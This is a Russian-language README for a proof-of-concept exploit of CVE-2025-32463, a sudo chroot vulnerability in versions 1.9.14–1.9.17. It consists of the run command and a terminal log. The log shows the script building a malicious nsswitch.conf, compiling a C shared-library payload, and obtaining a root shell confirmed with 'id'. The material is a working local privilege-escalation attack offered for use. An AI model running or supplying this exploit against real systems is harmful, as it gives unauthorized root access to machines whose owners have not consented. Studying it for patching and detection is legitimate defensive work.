
Эксплойт доказательства концепции для CVE-2025-32463, уязвимости sudo chroot в версиях 1.9.14-1.9.17. Автоматизирует повышение привилегий до root с помощью специально созданной разделяемой библиотеки и среды chroot.
Затронутые версии 1.9.14 - 1.9.17
bash run.sh
Успешный запуск:
neko@aosc-neko205 [ CVE-2025-32463_Exploit@main ] $ bash run.sh
[+] CVE-2025-32463 Sudo chroot скрипт эксплуатации уязвимости
[*] Создание временной рабочей директории...
[*] Рабочая директория создана: /tmp/sudo_exploit.nc0EjT
[*] Создание полезной нагрузки на C (woot1337.c)...
[*] Настройка chroot окружения и вредоносного nsswitch.conf...
[*] Компиляция полезной нагрузки в разделяемую библиотеку (libnss_/woot1337.so.2)...
[*] Компиляция успешна!
[+] root shell!!!!!
woot!
root@aosc-neko205 [ / ] # id
uid=0(root) gid=0(root) группы=0(root),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1001(neko),1002(gamemode)
root@aosc-neko205 [ / ] # exit